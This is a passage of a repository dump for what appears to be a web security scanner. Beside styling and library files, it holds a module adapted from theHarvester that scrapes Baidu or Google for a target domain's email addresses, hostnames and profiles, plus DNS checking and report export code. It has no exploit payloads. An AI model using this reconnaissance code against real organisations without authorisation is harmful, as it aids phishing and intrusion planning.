 19 | p{
 20 | 	padding: 0;
 21 | 	margin: 0;
 22 | 	color:#999;
 23 | 	font-family: 'Microsoft YaHei', sans-serif;
 24 | }
 25 | /*--banner--*/
 26 | 
 27 | /*---*/
 28 | nav a {
 29 | 	position: relative;
 30 | 	display: inline-block;
 31 | 	outline: none;
 32 | 	text-decoration: none;
 33 | }
 34 | nav a:hover,
 35 | nav a:focus {
 36 | 	outline: none;
 37 | }
 38 | .banner-section {
 39 |     background:url(../images/banner.jpg) no-repeat 0px 0px;
 40 | 	background-size:cover;
 41 |     background-attachment:fixed;
 42 | 	text-align:center;
 43 | 	-webkit-background-size: cover;
 44 |     -o-background-size: cover;
 45 |     -ms-background-size: cover;
 46 |     -moz-background-size: cover;
 47 | }
 48 | .tlinks{text-indent:-9999px;height:0;line-height:0;font-size:0;overflow:hidden;}
 49 | .banner-grids {
 50 |     background: rgba(95, 109, 133, 0.8);
 51 |     padding: 2.5em;
 52 | }
 53 | .banner-heder {
 54 |     margin: 17em 0 3em;
 55 | }
 56 | .banner-heder h3 {
 57 |     font-size: 4em;
 58 |     color: #fff;
 59 | 	font-weight:600;
 60 | }
 61 | .banner-heder span {
 62 |     display: block;
 63 | }
 64 | .sel {
 65 |     width: 100%;
 66 |     padding: .3em 1em;
 67 |     font-size: 1em;
 68 |     outline: none;
 69 |     text-transform: none;
 70 |     border: 1px solid #BBBBBB;
 71 | }
 72 | .check {
 73 |     width:auto;
 74 |     font-size: 16px;
 75 |     text-align: left;
 76 |     color: #fff;
 77 |     outline: none;
 78 | }
 79 | .search button[type="submit"] {
 80 |     width: 100%;
 81 |     background: #062f3c;
 82 |     border: none;
 83 |     outline: none;
 84 |     color: #fff;
 85 |     height: 100%;
 86 |     padding: 0px;
 87 |     max-height: 70px;
 88 |     font-size: 15px;
 89 | }
 90 | .content {
 91 |     background: rgba(95, 109, 133, 0.4);
 92 |     margin:0 5% 0% 5%;
 93 | }
 94 | .textarea {
 95 |     width: 99%;
 96 |     background:transparent;
 97 |     border-style:none;
 98 |     resize: none;
 99 |     color: #ffffff;
100 |     outline: none;
101 |     font-size: 22px;
102 | }
103 | .banner-header {
104 |     margin: 1% 4% 1% 4%;
105 |     height: 75%;
106 |     width: 80%; 
107 | }
108 | .hide {
109 |     display: none;
110 | }
111 | .banner-grids p {
112 |     font-size: 16px;
113 |     padding: 2px;
114 | }
115 | .banner-header p {
116 |     font-size: 13px;
117 | }
118 | .box {
119 |     font-size: 13px;
120 | }


--------------------------------------------------------------------------------
/static/fonts/glyphicons-halflings-regular.eot:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/AttackandDefenceSecurityLab/AD_WebScanner/59124f421202d20a2def1291799443c5635a4b69/static/fonts/glyphicons-halflings-regular.eot


--------------------------------------------------------------------------------
/static/fonts/glyphicons-halflings-regular.ttf:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/AttackandDefenceSecurityLab/AD_WebScanner/59124f421202d20a2def1291799443c5635a4b69/static/fonts/glyphicons-halflings-regular.ttf


--------------------------------------------------------------------------------
/static/fonts/glyphicons-halflings-regular.woff:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/AttackandDefenceSecurityLab/AD_WebScanner/59124f421202d20a2def1291799443c5635a4b69/static/fonts/glyphicons-halflings-regular.woff


--------------------------------------------------------------------------------
/static/fonts/glyphicons-halflings-regular.woff2:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/AttackandDefenceSecurityLab/AD_WebScanner/59124f421202d20a2def1291799443c5635a4b69/static/fonts/glyphicons-halflings-regular.woff2


--------------------------------------------------------------------------------
/static/images/banner.jpg:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/AttackandDefenceSecurityLab/AD_WebScanner/59124f421202d20a2def1291799443c5635a4b69/static/images/banner.jpg


--------------------------------------------------------------------------------
/static/js/npm.js:
--------------------------------------------------------------------------------
 1 | // This file is autogenerated via the `commonjs` Grunt task. You can require() this file in a CommonJS environment.
 2 | require('../../js/transition.js')
 3 | require('../../js/alert.js')
 4 | require('../../js/button.js')
 5 | require('../../js/carousel.js')
 6 | require('../../js/collapse.js')
 7 | require('../../js/dropdown.js')
 8 | require('../../js/modal.js')
 9 | require('../../js/tooltip.js')
10 | require('../../js/popover.js')
11 | require('../../js/scrollspy.js')
12 | require('../../js/tab.js')
13 | require('../../js/affix.js')


--------------------------------------------------------------------------------
/tHar_lib/__init__.py:
--------------------------------------------------------------------------------
1 | __all__ = ["markup", "graphs", "hostchecker"]
2 | 


--------------------------------------------------------------------------------
/tHar_lib/engine_search.py:
--------------------------------------------------------------------------------
 1 | from tHar_lib import myparser
 2 | import requests
 3 | import time
 4 | 
 5 | class Search:
 6 |     def __init__(self, word, limit, engine='baidu'):
 7 |         self.word = word
 8 |         self.total_results = ""
 9 |         self.server = "www.baidu.com"
10 |         self.hostname = "www.baidu.com"
11 |         self.userAgent = "(Mozilla/5.0 (Windows; U; Windows NT 6.0;en-US; rv:1.9.2) Gecko/20100115 Firefox/3.6"
12 |         self.limit = limit
13 |         self.counter = 0
14 |         self.quantity = '100'
15 |         self.engine = engine
16 |         if engine == 'baidu':
17 |             self.server = "www.baidu.com"
18 |         else:
19 |             self.server = 'www.google.com'
20 | 
21 | 
22 |     def do_search(self):
23 |         if self.engine == 'baidu':
24 |             url = 'http://' + self.server + "/s?wd=%40" + self.word + "&pn=" + str(self.counter) \
25 |                   + "&oq=" + self.word
26 |         else:
27 |             url = "http://" + self.server + "/search?num=" + self.quantity + "&start=" + str(self.counter) \
28 |                   + "&hl=en&meta=&q=%40\"" + self.word + "\""
29 |         r = requests.get(url=url)
30 |         self.total_results += str(r.content)
31 |         return self.total_results
32 | 
33 | 
34 |     def process(self):
35 |         while self.counter <= self.limit and self.counter <= 1000:
36 |             self.do_search()
37 |             time.sleep(1)
38 | 
39 |             #print("\tSearching " + str(self.counter) + " results...")
40 |             self.counter += 10
41 | 
42 |     def get_emails(self):
43 |         rawres = myparser.parser(self.total_results, self.word)
44 |         return rawres.emails()
45 | 
46 |     def get_hostnames(self):
47 |         rawres = myparser.parser(self.total_results, self.word)
48 |         return rawres.hostnames()
49 | 
50 |     def get_profiles(self):
51 |         rawres = myparser.parser(self.total_results, self.word)
52 |         return rawres.profiles()
53 | 


--------------------------------------------------------------------------------
/tHar_lib/hostchecker.py:
--------------------------------------------------------------------------------
 1 | #!/usr/bin/env python
 2 | # encoding: utf-8
 3 | """
 4 | Created by laramies on 2008-08-21.
 5 | """
 6 | 
 7 | import sys
 8 | import socket
 9 | 
10 | 
11 | class Checker():
12 | 
13 |     def __init__(self, hosts):
14 |         self.hosts = hosts
15 |         self.realhosts = []
16 | 
17 |     def check(self):
18 |         for x in self.hosts:
19 |             try:
20 |                 res = socket.gethostbyname(x)
21 |                 self.realhosts.append(x + " : " + res)
22 |             except Exception as e:
23 |                 self.realhosts.append(x + " : " + "empty")
24 |         return self.realhosts
25 | 


--------------------------------------------------------------------------------
/tHar_lib/htmlExport.py:
--------------------------------------------------------------------------------
  1 | from lib import markup
  2 | from lib import graphs
  3 | import re
  4 | 
  5 | 
  6 | class htmlExport():
  7 | 
  8 |     def __init__(self, users, hosts, vhosts, dnsres,
  9 |                  dnsrev, file, domain, shodan, tldres):
 10 |         self.users = users
 11 |         self.hosts = hosts
 12 |         self.vhost = vhosts
 13 |         self.fname = file
 14 |         self.dnsres = dnsres
 15 |         self.dnsrev = dnsrev
 16 |         self.domain = domain
 17 |         self.shodan = shodan
 18 |         self.tldres = tldres
 19 |         self.style = ""
 20 | 
 21 |     def styler(self):
 22 |         a = """<style type='text/css'>body {
 23 | 			 background: #FFFFFF  top no-repeat;
 24 | 		 }
 25 | 
 26 | 		h1 { font-family: arial, Times New Roman, times-roman, georgia, serif;
 27 | 			color: #680000;
 28 | 			margin: 0;
 29 | 			padding: 0px 0px 6px 0px;
 30 | 			font-size: 51px;
 31 | 			line-height: 44px;
 32 | 			letter-spacing: -2px;
 33 | 			font-weight: bold;
 34 | 		}
 35 | 
 36 | 		h3 { font-family: arial, Times New Roman, times-roman, georgia, serif;
 37 | 			color: #444;
 38 | 			margin: 0;
 39 | 			padding: 0px 0px 6px 0px;
 40 | 			font-size: 30px;
 41 | 			line-height: 44px;
 42 | 			letter-spacing: -2px;
 43 | 			font-weight: bold;
 44 | 		}
 45 | 
 46 | 		li { font-family: arial, Times New Roman, times-roman, georgia, serif;
 47 | 			color: #444;
 48 | 			margin: 0;
 49 | 			padding: 0px 0px 6px 0px;
 50 | 			font-size: 15px;
 51 | 			line-height: 15px;
 52 | 			letter-spacing: 0.4px;
 53 | 
 54 | 		}
 55 | 
 56 | 		h2{
 57 | 		font-family: arial, Times New Roman, times-roman, georgia, serif;
 58 | 				font-size: 48px;
 59 | 				line-height: 40px;
 60 | 				letter-spacing: -1px;
 61 | 				color: #680000 ;
 62 | 				margin: 0 0 0 0;
 63 | 				padding: 0 0 0 0;
 64 | 				font-weight: 100;
 65 | 
 66 | 		}
 67 | 
 68 | 		pre {
 69 | 		overflow: auto;
 70 | 		padding-left: 15px;
 71 | 		padding-right: 15px;
 72 | 		font-size: 11px;
 73 | 		line-height: 15px;
 74 | 		margin-top: 10px;
 75 | 		width: 93%;
 76 | 		display: block;
 77 | 		background-color: #eeeeee;
 78 | 		color: #000000;
 79 | 		max-height: 300px;
 80 | 		}
 81 | 		</style>
 82 | 		"""
 83 |         self.style = a
 84 | 
 85 |     def writehtml(self):
 86 |         page = markup.page()
 87 |         # page.init (title="theHarvester
 88 |         # Results",css=('edge.css'),footer="Edge-security 2011")A
 89 |         page.html()
 90 |         self.styler()
 91 |         page.head(self.style)
 92 |         page.body()
 93 |         page.h1("theHarvester results")
 94 |         page.h2("for :" + self.domain)
 95 |         page.h3("Dashboard:")
 96 |         graph = graphs.BarGraph('vBar')
 97 |         graph.values = [len(
 98 |             self.users),
 99 |             len(self.hosts),
100 |             len(self.vhost),
101 |             len(self.tldres),
102 |             len(self.shodan)]
103 |         graph.labels = ['Emails', 'hosts', 'Vhost', 'TLD', 'Shodan']
104 |         graph.showValues = 1
105 |         page.body(graph.create())
106 |         page.h3("E-mails names found:")
107 |         if self.users != []:
108 |             page.ul(class_="userslist")
109 |             page.li(self.users, class_="useritem")
110 |             page.ul.close()
111 |         else:
112 |             page.h2("No emails found")
113 |         page.h3("Hosts found:")
114 |         if self.hosts != []:
115 |             page.ul(class_="softlist")
116 |             page.li(self.hosts, class_="softitem")
117 |             page.ul.close()
118 |         else:
119 |             page.h2("No hosts found")
120 |         if self.tldres != []:
121 |             page.h3("TLD domains found in TLD expansion:")
122 |             page.ul(class_="tldlist")
123 |             page.li(self.tldres, class_="tlditem")
124 |             page.ul.close()
125 |         if self.dnsres != []:
126 |             page.h3("Hosts found in DNS brute force:")
127 |             page.ul(class_="dnslist")
128 |             page.li(self.dnsres, class_="dnsitem")
129 |             page.ul.close()
130 |         if self.dnsrev != []:
131 |             page.h3("Hosts found with reverse lookup :")
132 |             page.ul(class_="dnsrevlist")
133 |             page.li(self.dnsrev, class_="dnsrevitem")
134 |             page.ul.close()
135 |         if self.vhost != []:
136 |             page.h3("Virtual hosts found:")
137 |             page.ul(class_="pathslist")
138 |             page.li(self.vhost, class_="pathitem")
139 |             page.ul.close()
140 |         if self.shodan != []:
141 |             shodanalysis = []
142 |             page.h3("Shodan results:")
143 |             for x in self.shodan:
144 |                 res = x.split("SAPO")
145 |                 page.h3(res[0])
146 |                 page.a("Port :" + res[2])
147 |                 page.pre(res[1])
148 |                 page.pre.close()
149 |                 ban = res[1]
150 |                 reg_server = re.compile('Server:.*')
151 |                 temp = reg_server.findall(res[1])
152 |                 if temp != []:
153 |                     shodanalysis.append(res[0] + ":" + temp[0])
154 |             if shodanalysis != []:
155 |                 page.h3("Server technologies:")
156 |                 repeated = []
157 |                 for x in shodanalysis:
158 |                     if x not in repeated:
159 |                         page.pre(x)
160 |                         page.pre.close()
161 |                         repeated.append(x)
162 |         page.body.close()
163 |         page.html.close()
164 |         file = open(self.fname, 'w')
165 |         for x in page.content:
166 |             try:
167 |                 file.write(x)
168 |             except:
169 |                 print "Exception" + x  # send to logs
170 |                 pass
171 |         file.close
172 |         return "ok"
173 | 


--------------------------------------------------------------------------------
/tHar_lib/markup.py:
--------------------------------------------------------------------------------
  1 | # This code is in the public domain, it comes
  2 | # with absolutely no warranty and you can do
  3 | # absolutely whatever you want with it.
  4 | 
  5 | __date__ = '17 May 2007'
  6 | __version__ = '1.7'
  7 | __doc__ = """
  8 | This is markup.py - a Python module that attempts to
  9 | make it easier to generate HTML/XML from a Python program
 10 | in an intuitive, lightweight, customizable and pythonic way.
 11 | 
 12 | The code is in the public domain.
 13 | 
 14 | Version: %s as of %s.
 15 | 
 16 | Documentation and further info is at http://markup.sourceforge.net/
 17 | 
 18 | Please send bug reports, feature requests, enhancement
 19 | ideas or questions to nogradi at gmail dot com.
 20 | 
 21 | Installation: drop markup.py somewhere into your Python path.
 22 | """ % ( __version__, __date__ )
 23 | 
 24 | import string
 25 | 
 26 | 
 27 | class element:
 28 | 
 29 |     """This class handles the addition of a new element."""
 30 | 
 31 |     def __init__(self, tag, case='lower', parent=None):
 32 |         self.parent = parent
 33 | 
 34 |         if case == 'lower':
 35 |             self.tag = tag.lower()
 36 |         else:
 37 |             self.tag = tag.upper()
 38 | 
 39 |     def __call__(self, *args, **kwargs):
 40 |         if len(args) > 1:
 41 |             raise ArgumentError(self.tag)
 42 | 
 43 |         # if class_ was defined in parent it should be added to every element
 44 |         if self.parent is not None and self.parent.class_ is not None:
 45 |             if 'class_' not in kwargs:
 46 |                 kwargs['class_'] = self.parent.class_
 47 | 
 48 |         if self.parent is None and len(args) == 1:
 49 |             x = [self.render(self.tag, False, myarg, mydict)
 50 |                  for myarg, mydict in _argsdicts(args, kwargs)]
 51 |             return '\n'.join(x)
 52 |         elif self.parent is None and len(args) == 0:
 53 |             x = [self.render(self.tag, True, myarg, mydict)
 54 |                  for myarg, mydict in _argsdicts(args, kwargs)]
 55 |             return '\n'.join(x)
 56 | 
 57 |         if self.tag in self.parent.twotags:
 58 |             for myarg, mydict in _argsdicts(args, kwargs):
 59 |                 self.render(self.tag, False, myarg, mydict)
 60 |         elif self.tag in self.parent.onetags:
 61 |             if len(args) == 0:
 62 |                 for myarg, mydict in _argsdicts(args, kwargs):
 63 |                     # here myarg is always None, because len( args ) = 0
 64 |                     self.render(self.tag, True, myarg, mydict)
 65 |             else:
 66 |                 raise ClosingError(self.tag)
 67 |         elif self.parent.mode == 'strict_html' and self.tag in self.parent.deptags:
 68 |             raise DeprecationError(self.tag)
 69 |         else:
 70 |             raise InvalidElementError(self.tag, self.parent.mode)
 71 | 
 72 |     def render(self, tag, single, between, kwargs):
 73 |         """Append the actual tags to content."""
 74 | 
 75 |         out = "<%s" % tag
 76 |         for key, value in kwargs.iteritems():
 77 |             # when value is None that means stuff like <... checked>
 78 |             if value is not None:
 79 |                 # strip this so class_ will mean class, etc.
 80 |                 key = key.strip('_')
 81 |                 # special cases, maybe change _ to - overall?
 82 |                 if key == 'http_equiv':
 83 |                     key = 'http-equiv'
 84 |                 elif key == 'accept_charset':
 85 |                     key = 'accept-charset'
 86 |                 out = "%s %s=\"%s\"" % (out, key, escape(value))
 87 |             else:
 88 |                 out = "%s %s" % (out, key)
 89 |         if between is not None:
 90 |             out = "%s>%s</%s>" % (out, between, tag)
 91 |         else:
 92 |             if single:
 93 |                 out = "%s />" % out
 94 |             else:
 95 |                 out = "%s>" % out
 96 |         if self.parent is not None:
 97 |             self.parent.content.append(out)
 98 |         else:
 99 |             return out
100 | 
101 |     def close(self):
102 |         """Append a closing tag unless element has only opening tag."""
103 | 
104 |         if self.tag in self.parent.twotags:
105 |             self.parent.content.append("</%s>" % self.tag)
106 |         elif self.tag in self.parent.onetags:
107 |             raise ClosingError(self.tag)
108 |         elif self.parent.mode == 'strict_html' and self.tag in self.parent.deptags:
109 |             raise DeprecationError(self.tag)
110 | 
111 |     def open(self, **kwargs):
112 |         """Append an opening tag."""
113 | 
114 |         if self.tag in self.parent.twotags or self.tag in self.parent.onetags:
115 |             self.render(self.tag, False, None, kwargs)
116 |         elif self.mode == 'strict_html' and self.tag in self.parent.deptags:
117 |             raise DeprecationError(self.tag)
118 | 
119 | 
120 | class page:
121 | 
122 |     """This is our main class representing a document. Elements are added
123 |     as attributes of an instance of this class."""
124 | 
125 |     def __init__(self, mode='strict_html', case='lower',
126 |                  onetags=None, twotags=None, separator='\n', class_=None):
127 |         """Stuff that effects the whole document.
128 | 
129 |         mode -- 'strict_html'   for HTML 4.01 (default)
130 |                 'html'          alias for 'strict_html'
131 |                 'loose_html'    to allow some deprecated elements
132 |                 'xml'           to allow arbitrary elements
133 | 
134 |         case -- 'lower'         element names will be printed in lower case (default)
135 |                 'upper'         they will be printed in upper case
136 | 
137 |         onetags --              list or tuple of valid elements with opening tags only
138 |         twotags --              list or tuple of valid elements with both opening and closing tags
139 |                                 these two keyword arguments may be used to select
140 |                                 the set of valid elements in 'xml' mode
141 |                                 invalid elements will raise appropriate exceptions
142 | 
143 |         separator --            string to place between added elements, defaults to newline
144 | 
145 |         class_ --               a class that will be added to every element if defined"""
146 | 
147 |         valid_onetags = [
148 |             "AREA",
149 |             "BASE",
150 |             "BR",
151 |             "COL",
152 |             "FRAME",
153 |             "HR",
154 |             "IMG",
155 |             "INPUT",
156 |             "LINK",
157 |             "META",
158 |             "PARAM"]
159 |         valid_twotags = [
160 |             "A", "ABBR", "ACRONYM", "ADDRESS", "B", "BDO", "BIG", "BLOCKQUOTE", "BODY", "BUTTON",
161 |             "CAPTION", "CITE", "CODE", "COLGROUP", "DD", "DEL", "DFN", "DIV", "DL", "DT", "EM", "FIELDSET",
162 |             "FORM", "FRAMESET", "H1", "H2", "H3", "H4", "H5", "H6", "HEAD", "HTML", "I", "IFRAME", "INS",
163 |             "KBD", "LABEL", "LEGEND", "LI", "MAP", "NOFRAMES", "NOSCRIPT", "OBJECT", "OL", "OPTGROUP",
164 |             "OPTION", "P", "PRE", "Q", "SAMP", "SCRIPT", "SELECT", "SMALL", "SPAN", "STRONG", "STYLE",
165 |             "SUB", "SUP", "TABLE", "TBODY", "TD", "TEXTAREA", "TFOOT", "TH", "THEAD", "TITLE", "TR",
166 |             "TT", "UL", "VAR"]
167 |         deprecated_onetags = ["BASEFONT", "ISINDEX"]
168 |         deprecated_twotags = [
169 |             "APPLET",
170 |             "CENTER",
171 |             "DIR",
172 |             "FONT",
173 |             "MENU",
174 |             "S",
175 |             "STRIKE",
176 |             "U"]
177 | 
178 |         self.header = []
179 |         self.content = []
180 |         self.footer = []
181 |         self.case = case
182 |         self.separator = separator
183 | 
184 |         # init( ) sets it to True so we know that </body></html> has to be
185 |         # printed at the end
186 |         self._full = False
187 |         self.class_ = class_
188 | 
189 |         if mode == 'strict_html' or mode == 'html':
190 |             self.onetags = valid_onetags
191 |             self.onetags += map(string.lower, self.onetags)
192 |             self.twotags = valid_twotags
193 |             self.twotags += map(string.lower, self.twotags)
194 |             self.deptags = deprecated_onetags + deprecated_twotags
195 |             self.deptags += map(string.lower, self.deptags)
196 |             self.mode = 'strict_html'
197 |         elif mode == 'loose_html':
198 |             self.onetags = valid_onetags + deprecated_onetags
199 |             self.onetags += map(string.lower, self.onetags)
200 |             self.twotags = valid_twotags + deprecated_twotags
201 |             self.twotags += map(string.lower, self.twotags)
202 |             self.mode = mode
203 |         elif mode == 'xml':
204 |             if onetags and twotags:
205 |                 self.onetags = onetags
206 |                 self.twotags = twotags
207 |             elif (onetags and not twotags) or (twotags and not onetags):
208 |                 raise CustomizationError()
209 |             else:
210 |                 self.onetags = russell()
211 |                 self.twotags = russell()
212 |             self.mode = mode
213 |         else:
214 |             raise ModeError(mode)
215 | 
216 |     def __getattr__(self, attr):
217 |         if attr.startswith("__") and attr.endswith("__"):
218 |             raise AttributeError(attr)
219 |         return element(attr, case=self.case, parent=self)
220 | 
221 |     def __str__(self):
222 | 
223 |         if self._full and (self.mode == 'strict_html' or self.mode == 'loose_html'):
224 |             end = ['</body>', '</html>']
225 |         else:
226 |             end = []
227 | 
228 |         return (
229 |             self.separator.join(
230 |                 self.header +
231 |                 self.content +
232 |                 self.footer +
233 |                 end)
234 |         )
235 | 
236 |     def __call__(self, escape=False):
237 |         """Return the document as a string.
238 | 
239 |         escape --   False   print normally
240 |                     True    replace < and > by &lt; and &gt;
241 |                             the default escape sequences in most browsers"""
242 | 
243 |         if escape:
244 |             return _escape(self.__str__())
245 |         else:
246 |             return self.__str__()
247 | 
248 |     def add(self, text):
249 |         """This is an alias to addcontent."""
250 |         self.addcontent(text)
251 | 
252 |     def addfooter(self, text):
253 |         """Add some text to the bottom of the document"""
254 |         self.footer.append(text)
255 | 
256 |     def addheader(self, text):
257 |         """Add some text to the top of the document"""
258 |         self.header.append(text)
259 | 
260 |     def addcontent(self, text):
261 |         """Add some text to the main part of the document"""
262 |         self.content.append(text)
263 | 
264 |     def init(self, lang='en', css=None, metainfo=None, title=None, header=None,
265 |              footer=None, charset=None, encoding=None, doctype=None, bodyattrs=None, script=None):
266 |         """This method is used for complete documents with appropriate
267 |         doctype, encoding, title, etc information. For an HTML/XML snippet
268 |         omit this method.
269 | 
270 |         lang --     language, usually a two character string, will appear
271 |                     as <html lang='en'> in html mode (ignored in xml mode)
272 | 
273 |         css --      Cascading Style Sheet filename as a string or a list of
274 |                     strings for multiple css files (ignored in xml mode)
275 | 
276 |         metainfo -- a dictionary in the form { 'name':'content' } to be inserted
277 |                     into meta element(s) as <meta name='name' content='content'>
278 |                     (ignored in xml mode)
279 | 
280 |         bodyattrs --a dictionary in the form { 'key':'value', ... } which will be added
281 |                     as attributes of the <body> element as <body key='value' ... >
282 |                     (ignored in xml mode)
283 | 
284 |         script --   dictionary containing src:type pairs, <script type='text/type' src=src></script>
285 | 
286 |         title --    the title of the document as a string to be inserted into
287 |                     a title element as <title>my title</title> (ignored in xml mode)
288 | 
289 |         header --   some text to be inserted right after the <body> element
290 |                     (ignored in xml mode)
291 | 
292 |         footer --   some text to be inserted right before the </body> element
293 |                     (ignored in xml mode)
294 | 
295 |         charset --  a string defining the character set, will be inserted into a
296 |                     <meta http-equiv='Content-Type' content='text/html; charset=myset'>
297 |                     element (ignored in xml mode)
298 | 
299 |         encoding -- a string defining the encoding, will be put into to first line of
300 |                     the document as <?xml version='1.0' encoding='myencoding' ?> in
301 |                     xml mode (ignored in html mode)
302 | 
303 |         doctype --  the document type string, defaults to
304 |                     <!DOCTYPE HTML PUBLIC '-//W3C//DTD HTML 4.01 Transitional//EN'>
305 |                     in html mode (ignored in xml mode)"""
306 | 
307 |         self._full = True
308 | 
309 |         if self.mode == 'strict_html' or self.mode == 'loose_html':
310 |             if doctype is None:
311 |                 doctype = "<!DOCTYPE HTML PUBLIC '-//W3C//DTD HTML 4.01 Transitional//EN'>"
312 |             self.header.append(doctype)
313 |             self.html(lang=lang)
314 |             self.head()
315 |             if charset is not None:
316 |                 self.meta(
317 |                     http_equiv='Content-Type',
318 |                     content="text/html; charset=%s" %
319 |                     charset)
320 |             if metainfo is not None:
321 |                 self.metainfo(metainfo)
322 |             if css is not None:
323 |                 self.css(css)
324 |             if title is not None:
325 |                 self.title(title)
326 |             if script is not None:
327 |                 self.scripts(script)
328 |             self.head.close()
329 |             if bodyattrs is not None:
330 |                 self.body(**bodyattrs)
331 |             else:
332 |                 self.body()
333 |             if header is not None:
334 |                 self.content.append(header)
335 |             if footer is not None:
336 |                 self.footer.append(footer)
337 | 
338 |         elif self.mode == 'xml':
339 |             if doctype is None:
340 |                 if encoding is not None:
341 |                     doctype = "<?xml version='1.0' encoding='%s' ?>" % encoding
342 |                 else:
343 |                     doctype = "<?xml version='1.0' ?>"
344 |             self.header.append(doctype)
345 | 
346 |     def css(self, filelist):
347 |         """This convenience function is only useful for html.
348 |         It adds css stylesheet(s) to the document via the <link> element."""
349 | 
350 |         if isinstance(filelist, basestring):
351 |             self.link(
352 |                 href=filelist,
353 |                 rel='stylesheet',
354 |                 type='text/css',
355 |                 media='all')
356 |         else:
357 |             for file in filelist:
358 |                 self.link(
359 |                     href=file,
360 |                     rel='stylesheet',
361 |                     type='text/css',
362 |                     media='all')
363 | 
364 |     def metainfo(self, mydict):
365 |         """This convenience function is only useful for html.
366 |         It adds meta information via the <meta> element, the argument is
367 |         a dictionary of the form { 'name':'content' }."""
368 | 
369 |         if isinstance(mydict, dict):
370 |             for name, content in mydict.iteritems():
371 |                 self.meta(name=name, content=content)
372 |         else:
373 |             raise TypeError(
374 |                 "Metainfo should be called with a dictionary argument of name:content pairs.")
375 | 
376 |     def scripts(self, mydict):
377 |         """Only useful in html, mydict is dictionary of src:type pairs will
378 |         be rendered as <script type='text/type' src=src></script>"""
379 | 
380 |         if isinstance(mydict, dict):
381 |             for src, type in mydict.iteritems():
382 |                 self.script('', src=src, type='text/%s' % type)
383 |         else:
384 |             raise TypeError(
385 |                 "Script should be given a dictionary of src:type pairs.")
386 | 
387 | 
388 | class _oneliner:
389 | 
390 |     """An instance of oneliner returns a string corresponding to one element.
391 |     This class can be used to write 'oneliners' that return a string
392 |     immediately so there is no need to instantiate the page class."""
393 | 
394 |     def __init__(self, case='lower'):
395 |         self.case = case
396 | 
397 |     def __getattr__(self, attr):
398 |         if attr.startswith("__") and attr.endswith("__"):
399 |             raise AttributeError(attr)
400 |         return element(attr, case=self.case, parent=None)
401 | 
402 | oneliner = _oneliner(case='lower')
403 | upper_oneliner = _oneliner(case='upper')
404 | 
405 | 
406 | def _argsdicts(args, mydict):
407 |     """A utility generator that pads argument list and dictionary values, will only be called with len( args ) = 0, 1."""
408 | 
409 |     if len(args) == 0:
410 |         args = None,
411 |     elif len(args) == 1:
412 |         args = _totuple(args[0])
413 |     else:
414 |         raise Exception("We should have never gotten here.")
415 | 
416 |     mykeys = mydict.keys()
417 |     myvalues = map(_totuple, mydict.values())
418 | 
419 |     maxlength = max(map(len, [args] + myvalues))
420 | 
421 |     for i in xrange(maxlength):
422 |         thisdict = {}
423 |         for key, value in zip(mykeys, myvalues):
424 |             try:
425 |                 thisdict[key] = value[i]
426 |             except IndexError:
427 |                 thisdict[key] = value[-1]
428 |         try:
429 |             thisarg = args[i]
430 |         except IndexError:
431 |             thisarg = args[-1]
432 | 
433 |         yield thisarg, thisdict
434 | 
435 | 
436 | def _totuple(x):
437 |     """Utility stuff to convert string, int, float, None or anything to a usable tuple."""
438 | 
439 |     if isinstance(x, basestring):
440 |         out = x,
441 |     elif isinstance(x, (int, float)):
442 |         out = str(x),
443 |     elif x is None:
444 |         out = None,
445 |     else:
446 |         out = tuple(x)
447 | 
448 |     return out
449 | 
450 | 
451 | def escape(text, newline=False):
452 |     """Escape special html characters."""
453 | 
454 |     if isinstance(text, basestring):
455 |         if '&' in text:
456 |             text = text.replace('&', '&amp;')
457 |         if '>' in text:
458 |             text = text.replace('>', '&gt;')
459 |         if '<' in text:
460 |             text = text.replace('<', '&lt;')
461 |         if '\"' in text:
462 |             text = text.replace('\"', '&quot;')
463 |         if '\'' in text:
464 |             text = text.replace('\'', '&quot;')
465 |         if newline:
466 |             if '\n' in text:
467 |                 text = text.replace('\n', '<br>')
468 | 
469 |     return text
470 | 
471 | _escape = escape
472 | 
473 | 
474 | def unescape(text):
475 |     """Inverse of escape."""
476 | 
477 |     if isinstance(text, basestring):
478 |         if '&amp;' in text:
479 |             text = text.replace('&amp;', '&')
480 |         if '&gt;' in text:
481 |             text = text.replace('&gt;', '>')
482 |         if '&lt;' in text:
483 |             text = text.replace('&lt;', '<')
484 |         if '&quot;' in text:
485 |             text = text.replace('&quot;', '\"')
486 | 
487 |     return text
488 | 
489 | 
490 | class dummy:
491 | 
492 |     """A dummy class for attaching attributes."""
493 |     pass
494 | 
495 | doctype = dummy()
496 | doctype.frameset = "<!DOCTYPE HTML PUBLIC '-//W3C//DTD HTML 4.01 Frameset//EN' 'http://www.w3.org/TR/html4/frameset.dtd'>"
497 | doctype.strict = "<!DOCTYPE HTML PUBLIC '-//W3C//DTD HTML 4.01//EN' 'http://www.w3.org/TR/html4/strict.dtd'>"
498 | doctype.loose = "<!DOCTYPE HTML PUBLIC '-//W3C//DTD HTML 4.01 Transitional//EN' 'http://www.w3.org/TR/html4/loose.dtd'>"
499 | 
500 | 
501 | class russell:
502 | 
503 |     """A dummy class that contains anything."""
504 | 
505 |     def __contains__(self, item):
506 |         return True
507 | 
508 | 
509 | class MarkupError(Exception):
510 | 
511 |     """All our exceptions subclass this."""
512 | 
513 |     def __str__(self):
514 |         return self.message
515 | 
516 | 
517 | class ClosingError(MarkupError):
518 | 
519 |     def __init__(self, tag):
520 |         self.message = "The element '%s' does not accept non-keyword arguments (has no closing tag)." % tag
521 | 
522 | 
523 | class OpeningError(MarkupError):
524 | 
525 |     def __init__(self, tag):
526 |         self.message = "The element '%s' can not be opened." % tag
527 | 
528 | 
529 | class ArgumentError(MarkupError):
530 | 
531 |     def __init__(self, tag):
532 |         self.message = "The element '%s' was called with more than one non-keyword argument." % tag
533 | 
534 | 
535 | class InvalidElementError(MarkupError):
536 | 
537 |     def __init__(self, tag, mode):
538 |         self.message = "The element '%s' is not valid for your mode '%s'." % (
539 |             tag,
540 |             mode)
541 | 
542 | 
543 | class DeprecationError(MarkupError):
544 | 
545 |     def __init__(self, tag):
546 |         self.message = "The element '%s' is deprecated, instantiate markup.page with mode='loose_html' to allow it." % tag
547 | 
548 | 
549 | class ModeError(MarkupError):
550 | 
551 |     def __init__(self, mode):
552 |         self.message = "Mode '%s' is invalid, possible values: strict_html, loose_html, xml." % mode
553 | 
554 | 
555 | class CustomizationError(MarkupError):
556 | 
557 |     def __init__(self):
